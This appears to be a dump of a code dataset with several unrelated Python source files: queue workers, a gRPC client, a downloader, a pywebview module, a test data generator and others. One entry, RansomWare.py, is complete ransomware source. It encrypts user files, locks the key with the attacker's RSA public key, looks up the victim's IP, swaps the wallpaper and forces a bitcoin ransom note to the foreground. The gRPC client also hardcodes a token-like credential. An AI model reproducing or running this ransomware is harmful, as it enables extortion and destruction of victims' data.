source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
---|---|
training_queue.py
|
import threading
from concierge import constants
from concierge.concierge_queue import ConciergeQueue
def event_queue_worker():
eq = ConciergeQueue(constants.CF_EVENT,constants.event_queue,constants.EVENT_RATINGS_FILE)
eq.poll()
def media_queue_worker():
mq = ConciergeQueue(constants.CF_MEDIA,constants.media_queue,constants.MEDIA_RATINGS_FILE)
mq.poll()
def place_queue_worker():
pq = ConciergeQueue(constants.CF_PLACE,constants.place_queue,constants.PLACE_RATINGS_FILE)
pq.poll()
def tag_queue_worker():
tq = ConciergeQueue(constants.CF_TAG,constants.tag_queue,constants.TAG_RATINGS_FILE)
tq.poll()
# separate threads
event_queue_thread = threading.Thread(target=event_queue_worker)
event_queue_thread.start()
media_queue_thread = threading.Thread(target=media_queue_worker)
media_queue_thread.start()
place_queue_thread = threading.Thread(target=place_queue_worker)
place_queue_thread.start()
tag_queue_thread = threading.Thread(target=tag_queue_worker)
tag_queue_thread.start()
|
client.py
|
from __future__ import print_function
import grpc
from google.protobuf import json_format
import file_pb2
import file_pb2_grpc
from threading import Thread
import json
from multiprocessing import Queue
try:
import queue
except ImportError:
import Queue as queue
class Client:
""" gRPC Client class for streaming competition platform"""
channel = None
stub = None
def __init__(self, batch_size):
"""
:param batch_size: Integer value, defined by the competition and available at competition page
:param server_port: Connection string ('IP:port')
:param user_email: String, e-mail used for registering to competition
:param token: String, received after subscription to a competition
:param competition_code: String, received after subscription to a competition
:param first_prediction: Prediction, class generated from .proto file. Used to initiate communication with the
server. Not influencing the results. Should contain appropriate fields from .proto file.
"""
self.batch_size = batch_size
self.stop_thread = False
self.predictions_to_send = Queue()
self.channel = grpc.insecure_channel('localhost:50051')
self.stub = file_pb2_grpc.DataStreamerStub(self.channel)
self.user_email = 'admin'
self.competition_code = '3M'
self.token = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkk4JBg35D7U'
# self.predictions_to_send.put(file_pb2.Prediction(rowID=1000, target=333))
self.metadata = self.create_metadata(user_id=self.user_email, code=self.competition_code, token=self.token)
@staticmethod
def create_metadata(user_id, code, token):
"""
:param user_id:
:param code:
:param token:
:return:
"""
metadata = [(b'authorization', bytes(token, 'utf-8')), (b'user_id', bytes(user_id, 'utf-8')),
(b'competition_id', bytes(code, 'utf-8'))]
return metadata
def generate_predictions(self):
"""
Sending predictions
:return: Prediction
"""
while True:
try:
prediction = self.predictions_to_send.get(block=True, timeout=60)
print("Prediction: ", prediction)
yield prediction
except queue.Empty:
self.stop_thread = True
break
def loop_messages(self):
"""
Getting messages (data instances) from the stream.
:return:
"""
messages = self.stub.sendData(self.generate_predictions(), metadata=self.metadata)
try:
for message in messages:
message = json.loads(json_format.MessageToJson(message))
print("Original data instance: ", message)
if message['tag'] == 'TEST':
# v = message['target'] + 10
v = 543
prediction = file_pb2.Prediction(rowID=message['rowID'], target=v)
self.predictions_to_send.put(prediction)
if message['tag'] == 'INIT':
i = 1
if message['tag'] == 'TRAIN':
i = 1
if self.stop_thread:
break
except Exception as e:
print(str(e))
pass
def run(self):
"""
Start thread.
"""
print("Start")
t1 = Thread(target=self.loop_messages)
t1.start()
if __name__ == "__main__":
client_1 = Client(batch_size=5)
client_1.run()
|
Downloader.py
|
import os
import multiprocessing as mp
import requests
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from logger import Logger
class Downloader(QThread):
def __init__(self,
name='Downloader',
nprocs=2,
log_dir='.',
parent=None):
QThread.__init__(self, parent)
self.name = name
self.nprocs = nprocs
self.log = Logger(name, save_dir=log_dir)
self.exiting = False
self.args = None
self.dl_queue = mp.Queue()
def __del__(self):
self.exiting = True
self.wait()
def download(self):
[self.dl_queue.put(None) for _ in range(self.nprocs)]
dl_procs = [mp.Process(target=self.download_func)
for _ in range(self.nprocs)]
self.log('Starting {} downloads in {} threads'
.format(len(self.args), self.nprocs))
for proc in dl_procs:
proc.start()
[proc.join() for proc in dl_procs]
return 0
def download_func(self):
while True:
arg = self.dl_queue.get()
if arg is None:
break
if self.exiting:
self.log('Download cancel requested')
return -1
url, dl_path = arg
with open(dl_path, 'wb') as file:
res = requests.get(url, stream=True)
if res.headers.get('content-length') is None:
file.write(res.content)
else:
for data in res.iter_content():
file.write(data)
file_name = os.path.split(dl_path)[1]
self.log('{} written'.file_name)
def run(self):
self.download()
self.log('Download of {} files completed'.format(len(self.args)))
if __name__ == '__main__':
pa = os.path.realpath('patch.png')
pa2 = os.path.realpath('bun.png')
args = [('http://imgs.xkcd.com/comics/patch.png', pa),
('http://imgs.xkcd.com/comics/bun.png', pa2)]
dl = Downloader()
dl(args)
|
cert_puffin_reconnect_logic.py
|
#!/usr/bin/env python
import logging
import socket
import time
from threading import Thread
from bidfx import Session, Subject, Field
"""
Example of Pixie reconnect logic.
"""
def on_price_event(event):
print(f"Price update to {event}")
def on_subscription_event(event):
print(f"Subscription to {event.subject} is {event.status}")
def on_provider_event(event):
print(f"Provider {event.provider} is {event.status}")
def main():
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)-7s %(threadName)-12s %(message)s",
)
session = Session.create_from_ini_file()
pricing = session.pricing
pricing.callbacks.price_event_fn = on_price_event
pricing.callbacks.subscription_event_fn = on_subscription_event
pricing.callbacks.provider_event_fn = on_provider_event
session.pricing.start()
def killer():
time.sleep(10)
logging.error("** Killing the Puffin socket connection")
session.pricing._puffin_provider._opened_socket.shutdown(socket.SHUT_RDWR)
pricing.subscribe(
pricing.build.fx.indicative.spot.currency_pair("EURUSD").create_subject()
)
pricing.subscribe(
pricing.build.fx.indicative.spot.currency_pair("USDJPY").create_subject()
)
Thread(target=killer).start()
if __name__ == "__main__":
main()
|
__init__.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
pywebview is a lightweight cross-platform wrapper around a webview component that allows to display HTML content in its
own dedicated window. Works on Windows, OS X and Linux and compatible with Python 2 and 3.
(C) 2014-2018 Roman Sirokov and contributors
Licensed under BSD license
http://github.com/r0x0r/pywebview/
"""
import json
import logging
import os
import platform
import re
import sys
from threading import Event, Thread, current_thread
from uuid import uuid4
from functools import wraps
from webview.util import base_uri, parse_file_type, escape_string, transform_url, make_unicode, escape_line_breaks, inject_base_uri
from .js import css
from .localization import localization
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
OPEN_DIALOG = 10
FOLDER_DIALOG = 20
SAVE_DIALOG = 30
class Config (dict):
def __init__(self):
self.use_qt = 'USE_QT' in os.environ
self.use_win32 = 'USE_WIN32' in os.environ
self.gui = 'qt' if 'KDE_FULL_SESSION' in os.environ else None
self.gui = os.environ['PYWEBVIEW_GUI'].lower() \
if 'PYWEBVIEW_GUI' in os.environ and os.environ['PYWEBVIEW_GUI'].lower() in ['qt', 'gtk', 'win32'] \
else None
def __getitem__(self, key):
return getattr(self, key.lower())
def __setitem__(self, key, value):
setattr(self, key.lower(), value)
config = Config()
_initialized = False
_webview_ready = Event()
def _initialize_imports():
def import_gtk():
global gui
try:
import webview.gtk as gui
logger.debug('Using GTK')
return True
except (ImportError, ValueError) as e:
logger.exception('GTK cannot be loaded')
return False
def import_qt():
global gui
try:
import webview.qt as gui
logger.debug('Using QT')
return True
except ImportError as e:
logger.exception('QT cannot be loaded')
return False
def import_cocoa():
global gui
try:
import webview.cocoa as gui
return True
except ImportError:
logger.exception('PyObjC cannot be loaded')
return False
def import_win32():
global gui
try:
import webview.win32 as gui
logger.debug('Using Win32')
return True
except ImportError as e:
logger.exception('PyWin32 cannot be loaded')
return False
def import_winforms():
global gui
try:
import webview.winforms as gui
logger.debug('Using .NET')
return True
except ImportError as e:
logger.exception('pythonnet cannot be loaded')
return False
def try_import(guis):
while guis:
import_func = guis.pop(0)
if import_func():
return True
return False
global _initialized
if not _initialized:
if platform.system() == 'Darwin':
if config.gui == 'qt' or config.use_qt:
guis = [import_qt, import_cocoa]
else:
guis = [import_cocoa, import_qt]
if not try_import(guis):
raise Exception('You must have either PyObjC (for Cocoa support) or Qt with Python bindings installed in order to use pywebview.')
elif platform.system() == 'Linux' or platform.system() == 'OpenBSD':
if config.gui == 'gtk' or config.gui != 'qt' and not config.use_qt:
guis = [import_gtk, import_qt]
else:
guis = [import_qt, import_gtk]
if not try_import(guis):
raise Exception('You must have either QT or GTK with Python extensions installed in order to use pywebview.')
elif platform.system() == 'Windows':
if config.gui == 'win32' or config.use_win32:
guis = [import_win32, import_winforms]
else:
guis = [import_winforms, import_win32]
if not try_import(guis):
raise Exception('You must have either pythonnet or pywin32 installed in order to use pywebview.')
else:
raise Exception('Unsupported platform. Only Windows, Linux, OS X, OpenBSD are supported.')
_initialized = True
def _api_call(function):
"""
Decorator to call a pywebview API, checking for _webview_ready and raisings
appropriate Exceptions on failure.
"""
@wraps(function)
def wrapper(*args, **kwargs):
try:
_webview_ready.wait(5)
return function(*args, **kwargs)
except NameError:
raise Exception('Create a web view window first, before invoking this function')
except KeyError:
try:
uid = kwargs['uid']
except KeyError:
# uid not passed as a keyword arg, assumes it to be last in the arg list
uid = args[-1]
raise Exception('Cannot call function: No webview exists with uid: {}'.format(uid))
return wrapper
def create_window(title, url=None, js_api=None, width=800, height=600,
resizable=True, fullscreen=False, min_size=(200, 100), strings={}, confirm_quit=False,
background_color='#FFFFFF', text_select=False, debug=False):
"""
Create a web view window using a native GUI. The execution blocks after this function is invoked, so other
program logic must be executed in a separate thread.
:param title: Window title
:param url: URL to load
:param width: window width. Default is 800px
:param height:window height. Default is 600px
:param resizable True if window can be resized, False otherwise. Default is True
:param fullscreen: True if start in fullscreen mode. Default is False
:param min_size: a (width, height) tuple that specifies a minimum window size. Default is 200x100
:param strings: a dictionary with localized strings
:param confirm_quit: Display a quit confirmation dialog. Default is False
:param background_color: Background color as a hex string that is displayed before the content of webview is loaded. Default is white.
:param text_select: Allow text selection on page. Default is False.
:return: The uid of the created window.
"""
valid_color = r'^#(?:[0-9a-fA-F]{3}){1,2}$'
if not re.match(valid_color, background_color):
raise ValueError('{0} is not a valid hex triplet color'.format(background_color))
# Check if starting up from main thread; if not, wait; finally raise exception
if current_thread().name == 'MainThread':
uid = 'master'
if not _initialized:
_initialize_imports()
localization.update(strings)
else:
uid = 'child_' + uuid4().hex[:8]
if not _webview_ready.wait(5):
raise Exception('Call create_window from the main thread first, and then from subthreads')
_webview_ready.clear() # Make API calls wait while the new window is created
gui.create_window(uid, make_unicode(title), transform_url(url),
width, height, resizable, fullscreen, min_size, confirm_quit,
background_color, debug, js_api, text_select, _webview_ready)
return uid
@_api_call
def create_file_dialog(dialog_type=OPEN_DIALOG, directory='', allow_multiple=False, save_filename='', file_types=()):
"""
Create a file dialog
:param dialog_type: Dialog type: open file (OPEN_DIALOG), save file (SAVE_DIALOG), open folder (OPEN_FOLDER). Default
is open file.
:param directory: Initial directory
:param allow_multiple: Allow multiple selection. Default is false.
:param save_filename: Default filename for save file dialog.
:param file_types: Allowed file types in open file dialog. Should be a tuple of strings in the format:
filetypes = ('Description (*.extension[;*.extension[;...]])', ...)
:return: A tuple of selected files, None if cancelled.
"""
if type(file_types) != tuple and type(file_types) != list:
raise TypeError('file_types must be a tuple of strings')
for f in file_types:
parse_file_type(f)
if not os.path.exists(directory):
directory = ''
return gui.create_file_dialog(dialog_type, directory, allow_multiple, save_filename, file_types)
@_api_call
def load_url(url, uid='master'):
"""
Load a new URL into a previously created WebView window. This function must be invoked after WebView windows is
created with create_window(). Otherwise an exception is thrown.
:param url: url to load
:param uid: uid of the target instance
"""
gui.load_url(url, uid)
@_api_call
def load_html(content, base_uri=base_uri(), uid='master'):
"""
Load a new content into a previously created WebView window. This function must be invoked after WebView windows is
created with create_window(). Otherwise an exception is thrown.
:param content: Content to load.
:param base_uri: Base URI for resolving links. Default is the directory of the application entry point.
:param uid: uid of the target instance
"""
content = make_unicode(content)
gui.load_html(content, base_uri, uid)
@_api_call
def load_css(stylesheet, uid='master'):
code = css.src % stylesheet.replace('\n', '').replace('\r', '').replace('"', "'")
gui.evaluate_js(code, uid)
@_api_call
def set_title(title, uid='master'):
"""
Sets a new title of the window
"""
gui.set_title(title, uid)
@_api_call
def get_current_url(uid='master'):
"""
Get the URL currently loaded in the target webview
:param uid: uid of the target instance
"""
return gui.get_current_url(uid)
@_api_call
def destroy_window(uid='master'):
"""
Destroy a web view window
:param uid: uid of the target instance
"""
gui.destroy_window(uid)
@_api_call
def toggle_fullscreen(uid='master'):
"""
Toggle fullscreen mode
:param uid: uid of the target instance
"""
gui.toggle_fullscreen(uid)
@_api_call
def set_window_size(width, height, uid='master'):
"""
Set Window Size
:param width: desired width of target window
:param height: desired height of target window
:param uid: uid of the target instance
"""
gui.set_window_size(width, height, uid)
@_api_call
def evaluate_js(script, uid='master'):
"""
Evaluate given JavaScript code and return the result
:param script: The JavaScript code to be evaluated
:param uid: uid of the target instance
:return: Return value of the evaluated code
"""
escaped_script = 'JSON.stringify(eval("{0}"))'.format(escape_string(script))
return gui.evaluate_js(escaped_script, uid)
def window_exists(uid='master'):
"""
Check whether a webview with the given UID is up and running
:param uid: uid of the target instance
:return: True if the window exists, False otherwise
"""
try:
get_current_url(uid)
return True
except:
return False
def webview_ready(timeout=None):
"""
:param delay: optional timeout
:return: True when the last opened window is ready. False if the timeout is reached, when the timeout parameter is provided.
Until then blocks the calling thread.
"""
return _webview_ready.wait(timeout)
def _js_bridge_call(uid, api_instance, func_name, param):
def _call():
result = json.dumps(function(func_params))
code = 'window.pywebview._returnValues["{0}"] = {{ isSet: true, value: {1}}}'.format(func_name, escape_line_breaks(result))
evaluate_js(code, uid)
function = getattr(api_instance, func_name, None)
if function is not None:
try:
func_params = param if not param else json.loads(param)
t = Thread(target=_call)
t.start()
except Exception as e:
logger.exception('Error occurred while evaluating function {0}'.format(func_name))
else:
logger.error('Function {}() does not exist'.format(func_name))
|
creating _db_values.py
|
import os
import random
import datetime
import csv
import threading
import time
random.seed(os.urandom(16))
pessoa = {"sexo": ["M","F"],
"idade":[str(x) for x in range(128)],
"renda":[str(x) for x in range(1024)],
"escolaridade":["0","1","2","3"],
"idioma":[str(x) for x in range(4096)],
"pais":[str(x) for x in range(256)],
"localizador":["-1.45502-48.5024","-23.5489-46.6388"]}
def generate_data():
data = (pessoa["sexo"][random.randint(0,1)],random.randint(0,127),random.randint(0,1023),random.randint(0,3),
random.randint(0,4095),random.randint(0,255),pessoa["localizador"][random.randint(0,1)])
with open("test.csv",'a',newline='') as file:
datawriter = csv.writer(file, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
#datawriter.writerow(['Sexo','idade','renda','escolaridade','idioma','pais','localizador'])
for x in range(10**7):
datawriter.writerow([pessoa["sexo"][random.randint(0,1)],random.randint(0,127),random.randint(0,3),random.randint(0,1023),
random.randint(0,4095),pessoa["localizador"][random.randint(0,1)],random.randint(0,255)])
print(datetime.datetime.now())
t1=threading.Thread(target=generate_data)
t2=threading.Thread(target=generate_data)
t3=threading.Thread(target=generate_data)
t4=threading.Thread(target=generate_data)
t5=threading.Thread(target=generate_data)
t6=threading.Thread(target=generate_data)
t7=threading.Thread(target=generate_data)
t8=threading.Thread(target=generate_data)
t9=threading.Thread(target=generate_data)
t10=threading.Thread(target=generate_data)
t1.start()
t2.start()
t3.start()
t4.start()
t5.start()
t6.start()
t7.start()
t8.start()
t9.start()
t10.start()
while (t10.isAlive()):
print("thread 10 is still alive")
time.sleep(5)
print(datetime.datetime.now())
|
multi2.py
|
"""
Use multiprocess anonymous pipes to communicate. Returns 2 connection
object representing ends of the pipe: objects are sent on one end and
received on the other, though pipes are bidirectional by default
"""
import os
from multiprocessing import Process, Pipe
def sender(pipe):
"""
send object to parent on anonymous pipe
"""
pipe.send(['spam'] + [42, 'eggs'])
pipe.close()
def talker(pipe):
"""
send and receive objects on a pipe
"""
pipe.send(dict(name='Bob', spam=42))
reply = pipe.recv()
print('talker got:', reply)
if __name__ == '__main__':
(parentEnd, childEnd) = Pipe()
Process(target=sender, args=(childEnd,)).start() # spawn child with pipe
print('parent got:', parentEnd.recv()) # receive from child
parentEnd.close() # or auto-closed on gc
(parentEnd, childEnd) = Pipe()
child = Process(target=talker, args=(childEnd,))
child.start()
print('parent got:', parentEnd.recv()) # receieve from child
parentEnd.send({x * 2 for x in 'spam'}) # send to child
child.join() # wait for child exit
print('parent exit')
|
util.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
File: util.py
Description: util module for Python SDK sample.
"""
from threading import Thread
import io
import operator
import os.path
from PIL import Image
import wx
try:
import cognitive_face as CF
except ImportError:
import sys
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import cognitive_face as CF
IMAGE_WILDCARD = 'Image files (*.jpg, *.png)|*.jpg; *.png'
INNER_PANEL_WIDTH = 710
MAX_IMAGE_SIZE = 300
MAX_THUMBNAIL_SIZE = 75
STYLE = wx.SIMPLE_BORDER
SUBSCRIPTION_KEY_FILENAME = 'Subscription.txt'
ENDPOINT_FILENAME = 'Endpoint.txt'
ORIENTATION_TAG = 274
LOG_FACE_LIST_REQUEST = (
'Request: Face List {} will be used for build person database. '
'Checking whether group exists.')
LOG_FACE_LIST_NOT_EXIST = 'Response: Face List {} does not exist before.'
LOG_FACE_LIST_EXIST = 'Response: Face List {} exists.'
LABEL_FACE = ('{}, {} years old\n'
'Hair: {}, Facial Hair: {}\n'
'Makeup: {}, Emotion: {}\n'
'Occluded: {}, Exposure: {}\n'
'{}\n{}\n')
class SubscriptionKey(object):
"""Subscription Key."""
@classmethod
def get(cls):
"""Get the subscription key."""
if not hasattr(cls, 'key'):
cls.key = ''
if not cls.key:
if os.path.isfile(SUBSCRIPTION_KEY_FILENAME):
with io.open(SUBSCRIPTION_KEY_FILENAME, encoding='utf-8') as fin:
cls.key = fin.read().strip()
else:
cls.key = ''
CF.Key.set(cls.key)
return cls.key
@classmethod
def set(cls, key):
"""Set the subscription key."""
cls.key = key
with io.open(SUBSCRIPTION_KEY_FILENAME, 'w', encoding='utf-8') as fout:
fout.write(key)
CF.Key.set(cls.key)
@classmethod
def delete(cls):
"""Delete the subscription key."""
cls.key = ''
if os.path.isfile(SUBSCRIPTION_KEY_FILENAME):
os.remove(SUBSCRIPTION_KEY_FILENAME)
CF.Key.set(cls.key)
class Endpoint(object):
"""Endpoint."""
@classmethod
def get(cls):
"""Get the endpoint."""
if not hasattr(cls, 'endpoint'):
cls.endpoint = ''
if not cls.endpoint:
if os.path.isfile(ENDPOINT_FILENAME):
with io.open(ENDPOINT_FILENAME, encoding='utf-8') as fin:
cls.endpoint = fin.read().strip()
else:
cls.endpoint = CF.BaseUrl.get()
CF.BaseUrl.set(cls.endpoint)
return cls.endpoint
@classmethod
def set(cls, endpoint):
"""Set the endpoint."""
cls.endpoint = endpoint
with io.open(ENDPOINT_FILENAME, 'w', encoding='utf-8') as fout:
fout.write(endpoint)
CF.BaseUrl.set(cls.endpoint)
@classmethod
def delete(cls):
"""Delete the endpoint."""
cls.endpoint = ''
if os.path.isfile(ENDPOINT_FILENAME):
os.remove(ENDPOINT_FILENAME)
CF.BaseUrl.set(CF.util.DEFAULT_BASE_URL)
def scale_image(img, size=MAX_IMAGE_SIZE):
"""Scale the wx.Image."""
width = img.GetWidth()
height = img.GetHeight()
if width > height:
new_width = size
new_height = size * height / width
else:
new_height = size
new_width = size * width / height
img = img.Scale(new_width, new_height)
return img
def rotate_image(path):
"""Rotate the image from path and return wx.Image."""
img = Image.open(path)
try:
exif = img._getexif()
if exif[ORIENTATION_TAG] == 3:
img = img.rotate(180, expand=True)
elif exif[ORIENTATION_TAG] == 6:
img = img.rotate(270, expand=True)
elif exif[ORIENTATION_TAG] == 8:
img = img.rotate(90, expand=True)
except:
pass
return pil_image_to_wx_image(img)
def draw_bitmap_rectangle(bitmap, faces):
"""Draw rectangle on bitmap."""
dc = wx.MemoryDC(bitmap.bmp)
dc.SetPen(wx.BLUE_PEN)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.SetTextBackground('black')
dc.SetTextForeground('white')
dc.SetBackgroundMode(wx.SOLID)
dc.SetFont(
wx.Font(8, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_BOLD))
for face in faces:
dc.DrawRectangle(
face.rect.left * bitmap.scale, face.rect.top * bitmap.scale,
face.rect.width * bitmap.scale, face.rect.height * bitmap.scale)
if face.name:
text_width, text_height = dc.GetTextExtent(face.name)
dc.DrawText(face.name, face.rect.left * bitmap.scale,
face.rect.top * bitmap.scale - text_height)
dc.SelectObject(wx.NullBitmap)
bitmap.bitmap.SetBitmap(bitmap.bmp)
def pil_image_to_wx_image(pil_image):
"""Convert from PIL image to wx image."""
wx_image = wx.Image(pil_image.width, pil_image.height)
wx_image.SetData(pil_image.convert("RGB").tobytes())
return wx_image
def key_with_max_value(item):
"""Get the key with maximum value in a dict."""
return max(item.items(), key=operator.itemgetter(1))[0]
def async(func):
"""Async wrapper."""
def wrapper(*args, **kwargs):
"""Async wrapper."""
thr = Thread(target=func, args=args, kwargs=kwargs)
thr.start()
return wrapper
|
RansomWare.py
|
# Imports
from cryptography.fernet import Fernet # encrypt/decrypt files on target system
import os # to get system root
import webbrowser # to load webbrowser to go to specific website eg bitcoin
import ctypes # so we can intereact with windows dlls and change windows background etc
import urllib.request # used for downloading and saving background image
import requests # used to make get reqeust to api.ipify.org to get target machine ip addr
import time # used to time.sleep interval for ransom note & check desktop to decrypt system/files
import datetime # to give time limit on ransom note
import subprocess # to create process for notepad and open ransom note
import win32gui # used to get window text to see if ransom note is on top of all other windows
from Crypto.PublicKey import RSA
from Crypto.Random import get_random_bytes
from Crypto.Cipher import AES, PKCS1_OAEP
import base64
import threading # used for ransom note and decryption key on dekstop
class RansomWare:
# File exstensions to seek out and Encrypt
file_exts = [
'txt',
'xls',
'xlsx',
'pem',
'rtf',
'jpg',
'png',
# We comment out 'png' so that we can see the RansomWare only encrypts specific files that we have chosen-
# -and leaves other files un-ecnrypted etc.
# 'png',
]
def __init__(self):
# Key that will be used for Fernet object and encrypt/decrypt method
self.key = None
# Encrypt/Decrypter
self.crypter = None
# RSA public key used for encrypting/decrypting fernet object eg, Symmetric key
self.public_key = None
''' Root directorys to start Encryption/Decryption from
CAUTION: Do NOT use self.sysRoot on your own PC as you could end up messing up your system etc...
CAUTION: Play it safe, create a mini root directory to see how this software works it is no different
CAUTION: eg, use 'localRoot' and create Some folder directory and files in them folders etc.
'''
# Use sysroot to create absolute path for files, etc. And for encrypting whole system
self.sysRoot = os.path.expanduser('~')
# Use localroot to test encryption softawre and for absolute path for files and encryption of "test system"
self.localRoot = r'C:\Users\Username\Desktop\localRoot' # Debugging/Testing
# Get public IP of person, for more analysis etc. (Check if you have hit gov, military ip space LOL)
self.publicIP = requests.get('https://api.ipify.org').text
# Generates [SYMMETRIC KEY] on victim machine which is used to encrypt the victims data
def generate_key(self):
# Generates a url safe(base64 encoded) key
self.key = Fernet.generate_key()
# Creates a Fernet object with encrypt/decrypt methods
self.crypter = Fernet(self.key)
# Write the fernet(symmetric key) to text file
def write_key(self):
with open('fernet_key.txt', 'wb') as f:
f.write(self.key)
# Encrypt [SYMMETRIC KEY] that was created on victim machine to Encrypt/Decrypt files with our PUBLIC ASYMMETRIC-
# -RSA key that was created on OUR MACHINE. We will later be able to DECRYPT the SYSMETRIC KEY used for-
# -Encrypt/Decrypt of files on target machine with our PRIVATE KEY, so that they can then Decrypt files etc.
def encrypt_fernet_key(self):
with open('fernet_key.txt', 'rb') as fk:
fernet_key = fk.read()
with open('fernet_key.txt', 'wb') as f:
# Public RSA key
self.public_key = RSA.import_key(open('public.pem').read())
# Public encrypter object
public_crypter = PKCS1_OAEP.new(self.public_key)
# Encrypted fernet key
enc_fernent_key = public_crypter.encrypt(fernet_key)
# Write encrypted fernet key to file
f.write(enc_fernent_key)
# Write encrypted fernet key to dekstop as well so they can send this file to be unencrypted and get system/files back
with open(f'{self.sysRoot}\Desktop\EMAIL_ME.txt', 'wb') as fa:
fa.write(enc_fernent_key)
# Assign self.key to encrypted fernet key
self.key = enc_fernent_key
# Remove fernet crypter object
self.crypter = None
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt file - file_path:str:absolute file path eg, C:/Folder/Folder/Folder/Filename.txt
def crypt_file(self, file_path, encrypted=False):
with open(file_path, 'rb') as f:
# Read data from file
data = f.read()
if not encrypted:
# Print file contents - [debugging]
print(data)
# Encrypt data from file
_data = self.crypter.encrypt(data)
# Log file encrypted and print encrypted contents - [debugging]
print('> File encrpyted')
print(_data)
else:
# Decrypt data from file
_data = self.crypter.decrypt(data)
# Log file decrypted and print decrypted contents - [debugging]
print('> File decrpyted')
print(_data)
with open(file_path, 'wb') as fp:
# Write encrypted/decrypted data to file using same filename to overwrite original file
fp.write(_data)
# [SYMMETRIC KEY] Fernet Encrypt/Decrypt files on system using the symmetric key that was generated on victim machine
def crypt_system(self, encrypted=False):
system = os.walk(self.localRoot, topdown=True)
for root, dir, files in system:
for file in files:
file_path = os.path.join(root, file)
if not file.split('.')[-1] in self.file_exts:
continue
if not encrypted:
self.crypt_file(file_path)
else:
self.crypt_file(file_path, encrypted=True)
@staticmethod
def what_is_bitcoin():
url = 'https://bitcoin.org'
# Open browser to the https://bitcoin.org so they know what bitcoin is
webbrowser.open(url)
def change_desktop_background(self):
imageUrl = 'https://images.idgesg.net/images/article/2018/02/ransomware_hacking_thinkstock_903183876-100749983-large.jpg'
# Go to specif url and download+save image using absolute path
path = f'{self.sysRoot}\Desktop\background.jpg'
urllib.request.urlretrieve(imageUrl, path)
SPI_SETDESKWALLPAPER = 20
# Access windows dlls for funcionality eg, changing dekstop wallpaper
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, path, 0)
def ransom_note(self):
date = datetime.date.today().strftime('%d-%B-Y')
with open('RANSOM_NOTE.txt', 'w') as f:
f.write(f'''
The harddisks of your computer have been encrypted with an Military grade encryption algorithm.
There is no way to restore your data without a special key.
Only we can decrypt your files!
To purchase your key and restore your data, please follow these three easy steps:
1. Email the file called EMAIL_ME.txt at {self.sysRoot}Desktop/EMAIL_ME.txt to [email protected]
2. You will recieve your personal BTC address for payment.
Once payment has been completed, send another email to [email protected] stating "PAID".
We will check to see if payment has been paid.
3. You will receive a text file with your KEY that will unlock all your files.
IMPORTANT: To decrypt your files, place text file on desktop and wait. Shortly after it will begin to decrypt all files.
WARNING:
Do NOT attempt to decrypt your files with any software as it is obselete and will not work, and may cost you more to unlcok your files.
Do NOT change file names, mess with the files, or run deccryption software as it will cost you more to unlock your files-
-and there is a high chance you will lose your files forever.
Do NOT send "PAID" button without paying, price WILL go up for disobedience.
Do NOT think that we wont delete your files altogether and throw away the key if you refuse to pay. WE WILL.
''')
def show_ransom_note(self):
# Open the ransom note
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
count = 0 # Debugging/Testing
while True:
time.sleep(0.1)
top_window = win32gui.GetWindowText(win32gui.GetForegroundWindow())
if top_window == 'RANSOM_NOTE - Notepad':
print('Ransom note is the top window - do nothing') # Debugging/Testing
pass
else:
print('Ransom note is not the top window - kill/create process again') # Debugging/Testing
# Kill ransom note so we can open it agian and make sure ransom note is in ForeGround (top of all windows)
time.sleep(0.1)
ransom.kill()
# Open the ransom note
time.sleep(0.1)
ransom = subprocess.Popen(['notepad.exe', 'RANSOM_NOTE.txt'])
# sleep for 10 seconds
time.sleep(10)
count +=1
if count == 5:
break
# Decrypts system when text file with un-encrypted key in it is placed on dekstop of target machine
def put_me_on_desktop(self):
# Loop to check file and if file it will read key and then self.key + self.cryptor will be valid for decrypting-
# -the files
print('started') # Debugging/Testing
while True:
try:
print('trying') # Debugging/Testing
# The ATTACKER decrypts the fernet symmetric key on their machine and then puts the un-encrypted fernet-
# -key in this file and sends it in a email to victim. They then put this on the desktop and it will be-
# -used to un-encrypt the system. AT NO POINT DO WE GIVE THEM THE PRIVATE ASSYEMTRIC KEY etc.
with open(f'{self.sysRoot}/Desktop/PUT_ME_ON_DESKTOP.txt', 'r') as f:
self.key = f.read()
self.crypter = Fernet(self.key)
# Decrpyt system once have file is found and we have cryptor with the correct key
self.crypt_system(encrypted=True)
print('decrypted') # Debugging/Testing
break
except Exception as e:
print(e) # Debugging/Testing
pass
time.sleep(10) # Debugging/Testing check for file on desktop ever 10 seconds
print('Checking for PUT_ME_ON_DESKTOP.txt') # Debugging/Testing
# Would use below code in real life etc... above 10secs is just to "show" concept
# Sleep ~ 3 mins
# secs = 60
# mins = 3
# time.sleep((mins*secs))
def main():
# testfile = r'D:\Coding\Python\RansomWare\RansomWare_Software\testfile.png'
rw = RansomWare()
rw.generate_key()
rw.crypt_system()
rw.write_key()
rw.encrypt_fernet_key()
rw.change_desktop_background()
rw.what_is_bitcoin()
rw.ransom_note()
t1 = threading.Thread(target=rw.show_ransom_note)
t2 = threading.Thread(target=rw.put_me_on_desktop)
t1.start()
print('> RansomWare: Attack completed on target machine and system is encrypted') # Debugging/Testing
print('> RansomWare: Waiting for attacker to give target machine document that will un-encrypt machine') # Debugging/Testing
t2.start()
print('> RansomWare: Target machine has been un-encrypted') # Debugging/Testing
print('> RansomWare: Completed') # Debugging/Testing
if __name__ == '__main__':
main()
|
dual_tor_io.py
|
import datetime
import threading
import time
import socket
import random
import struct
import ipaddress
import logging
import json
import scapy.all as scapyall
import ptf.testutils as testutils
from operator import itemgetter
from itertools import groupby
from tests.common.utilities import InterruptableThread
from natsort import natsorted
from collections import defaultdict
TCP_DST_PORT = 5000
SOCKET_RECV_BUFFER_SIZE = 10 * 1024 * 1024
